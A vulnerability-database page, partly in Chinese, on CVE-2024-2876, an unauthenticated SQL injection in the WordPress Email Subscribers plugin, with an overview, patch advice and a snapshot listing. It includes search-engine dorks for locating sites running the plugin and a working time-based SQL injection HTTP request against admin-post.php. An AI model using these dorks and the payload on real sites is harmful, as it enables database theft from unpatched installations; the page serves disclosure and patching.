关联漏洞
标题:
WordPress Plugin email-subscribers SQL注入漏洞
(CVE-2024-2876)
描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress Plugin email-subscribers 5.7.14及之前版本存在SQL注入漏洞,该漏洞源于 IG_ES_Subscribers_Query 中的 run函数对用户提供的参数转义不充分,攻击者利用该漏洞可以将额外的 SQL 查询附
介绍
# CVE-2024-2876 - SQL Injection Vulnerability in Email Subscribers by Icegram Express
## Overview
CVE-2024-2876 is a critical security vulnerability found in the "Email Subscribers by Icegram Express" plugin for WordPress. This vulnerability affects versions up to and including 5.7.14 and poses significant risks to over 90,000 websites.
### Vulnerability Details
- **CVE-ID**: CVE-2024-2876
- **CVSS Score**: 9.8 (Critical)
- **Affected Versions**: Up to 5.7.14
- **Patched Version**: 5.7.15 and above
### Description
The vulnerability is a SQL injection flaw that allows unauthenticated attackers to execute malicious SQL queries on the affected WordPress databases. By manipulating user inputs that are not properly sanitized, attackers can extract sensitive information such as usernames, email addresses, password hashes, and subscriber lists.
### Exploit Mechanism
The SQL injection occurs within the `run` function of the plugin's `IG_ES_Subscribers_Query` class, where inadequate input validation leads to unauthorized SQL code execution. This compromises the integrity and confidentiality of the data stored in the WordPress database.
## Dorks CVE-2024-2876
- FOFA : body="/wp-content/plugins/email-subscribers/"
- publicwww : "/wp-content/plugins/email-subscribers/"
# POC CVE-2024-2876
```python
POST /wp-admin/admin-post.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111
```
## Recommendations
1. **Immediate Update**: If you are using the "Email Subscribers by Icegram Express" plugin, upgrade to version 5.7.15 or later immediately to apply the security fix.
2. **Regular Audits**: Regularly review and update all WordPress plugins and themes to their latest versions to ensure security.
3. **Security Plugins**: Use reputable WordPress security plugins to enhance defenses against SQL injection and other cyber threats.
4. **Strong Password Policies**: Implement strong and unique passwords for all accounts related to your WordPress site to reduce unauthorized access risks.
## Impact of Non-Compliance
Failing to update the affected plugin can leave websites vulnerable to data breaches and unauthorized access. Given the widespread use of this plugin, immediate action is crucial to secure installations.
文件快照
[4.0K] /data/pocs/9fda6460dd14956eac2d795c85a6c0c4a4ffd003
├── [ 842] CVE-2024-2876.yaml
└── [2.5K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。